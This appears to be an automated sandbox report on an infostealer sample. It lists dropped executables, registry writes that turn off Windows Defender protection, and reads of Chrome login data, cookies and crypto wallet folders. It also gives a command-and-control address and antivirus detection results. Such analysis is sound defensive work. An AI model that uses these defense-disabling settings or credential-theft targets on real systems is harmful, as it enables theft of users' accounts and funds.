                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040CE09
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_0040E61C
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00416F6A
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: 10_2_004123F1 SetUnhandledExceptionFilter,10_2_004123F1
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001718A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_001718A3
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeCode function: GetLocaleInfoA,10_2_00417A20
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00177155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00177155
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeCode function: 4_2_00007FFBACE6077D GetUserNameA,4_2_00007FFBACE6077D
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00172BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00172BFB

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: caQi43qE17.exe, 0000000A.00000002.369592514.0000000005A06000.00000004.00000020.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.369592514.000000000598D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.4a80ee8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.7e6cce.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.4b50000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.7e6cce.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.file.exe.50d5420.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.4b50000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.file.exe.50d5420.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.4a80000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.3.caQi43qE17.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.4a80000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.3.caQi43qE17.exe.941a70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.4a80ee8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.7e7bb6.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.3.caQi43qE17.exe.941a70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.7e7bb6.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.680e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000003.300274214.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.362811186.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.368647038.0000000004B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.256542191.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.363309849.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000003.303183570.0000000000941000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: caQi43qE17.exe PID: 4632, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe, type: DROPPED
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                    Source: caQi43qE17.exe, 0000000A.00000002.369592514.000000000598D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets\*x
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                    Source: caQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                    Source: caQi43qE17.exe, 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: Yara matchFile source: Process Memory Space: caQi43qE17.exe PID: 4632, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.4a80ee8.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.7e6cce.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.4b50000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.7e6cce.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.file.exe.50d5420.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.4b50000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.file.exe.50d5420.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.4a80000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.3.caQi43qE17.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.4a80000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.3.caQi43qE17.exe.941a70.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.4a80ee8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.7e7bb6.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.3.caQi43qE17.exe.941a70.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.7e7bb6.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.caQi43qE17.exe.680e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000003.300274214.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.362811186.0000000000680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.368647038.0000000004B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.256542191.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.363309849.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000003.303183570.0000000000941000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: caQi43qE17.exe PID: 4632, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe, type: DROPPED
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts221
                    Windows Management Instrumentation
                    1
                    Windows Service
                    2
                    Bypass User Access Control
                    21
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium2
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                    System Shutdown/Reboot
                    Default Accounts3
                    Native API
                    Boot or Logon Initialization Scripts1
                    Access Token Manipulation
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol3
                    Data from Local System
                    Exfiltration Over Bluetooth1
                    Non-Standard Port
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts2
                    Command and Scripting Interpreter
                    Logon Script (Windows)1
                    Windows Service
                    3
                    Obfuscated Files or Information
                    Security Account Manager1
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Input Capture
                    Automated Exfiltration1
                    Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local Accounts1
                    Service Execution
                    Logon Script (Mac)1
                    Process Injection
                    21
                    Software Packing
                    NTDS137
                    System Information Discovery
                    Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Timestomp
                    LSA Secrets361
                    Security Software Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common2
                    Bypass User Access Control
                    Cached Domain Credentials231
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                    Masquerading
                    DCSync12
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job231
                    Virtualization/Sandbox Evasion
                    Proc Filesystem1
                    Application Window Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                    Access Token Manipulation
                    /etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                    Process Injection
                    Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                    Rundll32
                    Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 816370 Sample: file.exe Startdate: 27/02/2023 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus detection for dropped file 2->58 60 8 other signatures 2->60 9 file.exe 1 4 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        16 2 other processes 2->16 process3 file4 44 C:\Users\user\AppData\...\pluT14Nj54.exe, PE32 9->44 dropped 46 C:\Users\user\AppData\...\grWB27Fb84.exe, PE32 9->46 dropped 18 pluT14Nj54.exe 1 4 9->18         started        process5 file6 36 C:\Users\user\AppData\...\plct23La85.exe, PE32 18->36 dropped 38 C:\Users\user\AppData\...\fuYn3946BI92.exe, PE32 18->38 dropped 62 Multi AV Scanner detection for dropped file 18->62 64 Machine Learning detection for dropped file 18->64 22 plct23La85.exe 1 4 18->22         started        signatures7 process8 file9 40 C:\Users\user\AppData\...\plvy67MJ29.exe, PE32 22->40 dropped 42 C:\Users\user\AppData\...\diIN97YY43.exe, PE32 22->42 dropped 66 Multi AV Scanner detection for dropped file 22->66 68 Machine Learning detection for dropped file 22->68 26 plvy67MJ29.exe 1 4 22->26         started        signatures10 process11 file12 48 C:\Users\user\AppData\...\caQi43qE17.exe, PE32 26->48 dropped 50 C:\Users\user\AppData\...\buze36rj14.exe, PE32 26->50 dropped 70 Machine Learning detection for dropped file 26->70 30 caQi43qE17.exe 5 26->30         started        34 buze36rj14.exe 9 1 26->34         started        signatures13 process14 dnsIp15 52 193.233.20.24, 4123, 49699 REDCOM-ASRedcomKhabarovskRussiaRU Russian Federation 30->52 72 Detected unpacking (changes PE section rights) 30->72 74 Detected unpacking (overwrites its own PE header) 30->74 76 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 30->76 84 3 other signatures 30->84 78 Machine Learning detection for dropped file 34->78 80 Disable Windows Defender notifications (registry) 34->80 82 Disable Windows Defender real time protection (registry) 34->82 signatures16

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    file.exe64%ReversingLabsByteCode-MSIL.Trojan.RedLine
                    file.exe54%VirustotalBrowse
                    file.exe100%AviraHEUR/AGEN.1252166
                    file.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe100%AviraHEUR/AGEN.1252166
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\fuYn3946BI92.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe74%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\grWB27Fb84.exe69%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe54%ReversingLabsWin32.Trojan.Tedy
                    C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe47%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\fuYn3946BI92.exe26%ReversingLabsWin32.Trojan.CrypterX
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\fuYn3946BI92.exe26%VirustotalBrowse
                    C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe54%ReversingLabsWin32.Trojan.Tedy
                    C:\Users\user\AppData\Local\Temp\IXP002.TMP\diIN97YY43.exe26%ReversingLabsWin32.Trojan.CrypterX
                    SourceDetectionScannerLabelLinkDownload
                    3.3.plvy67MJ29.exe.4fa6d7e.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                    2.3.plct23La85.exe.4e6a220.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                    0.2.file.exe.170000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                    0.0.file.exe.170000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                    1.3.pluT14Nj54.exe.47fe420.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                    http://tempuri.org/0%URL Reputationsafe
                    http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id90%URL Reputationsafe
                    http://tempuri.org/Entity/Id80%URL Reputationsafe
                    http://tempuri.org/Entity/Id50%URL Reputationsafe
                    http://tempuri.org/Entity/Id40%URL Reputationsafe
                    http://tempuri.org/Entity/Id70%URL Reputationsafe
                    http://tempuri.org/Entity/Id60%URL Reputationsafe
                    http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id14V0%URL Reputationsafe
                    http://tempuri.org/Entity/Id14V0%URL Reputationsafe
                    http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                    https://api.ip.sb/ip0%URL Reputationsafe
                    https://api.ip.sb/ip0%URL Reputationsafe
                    http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id200%URL Reputationsafe
                    http://tempuri.org/Entity/Id210%URL Reputationsafe
                    http://tempuri.org/Entity/Id220%URL Reputationsafe
                    http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id100%URL Reputationsafe
                    http://tempuri.org/Entity/Id110%URL Reputationsafe
                    http://tempuri.org/Entity/Id110%URL Reputationsafe
                    http://tempuri.org/Entity/Id120%URL Reputationsafe
                    http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id130%URL Reputationsafe
                    http://tempuri.org/Entity/Id140%URL Reputationsafe
                    http://tempuri.org/Entity/Id150%URL Reputationsafe
                    http://tempuri.org/Entity/Id160%URL Reputationsafe
                    http://tempuri.org/Entity/Id160%URL Reputationsafe
                    http://tempuri.org/Entity/Id170%URL Reputationsafe
                    http://tempuri.org/Entity/Id180%URL Reputationsafe
                    http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id190%URL Reputationsafe
                    http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                    http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                    193.233.20.24:41230%Avira URL Cloudsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    193.233.20.24:4123true
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://schemas.xmlsoap.org/ws/2005/02/sc/sctcaQi43qE17.exe, 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://duckduckgo.com/chrome_newtabcaQi43qE17.exe, 0000000A.00000002.366074072.0000000003936000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.000000000296F000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000381E000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000383B000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000028E2000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000036E1000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.0000000003919000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000373F000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.364130402.00000000029FD000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000038B8000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.000000000389B000.00000004.00000800.00020000.00000000.sdmp, caQi43qE17.exe, 0000000A.00000002.366074072.00000000037BD000.00000004.00000800.00020000.00000000.sdmp, 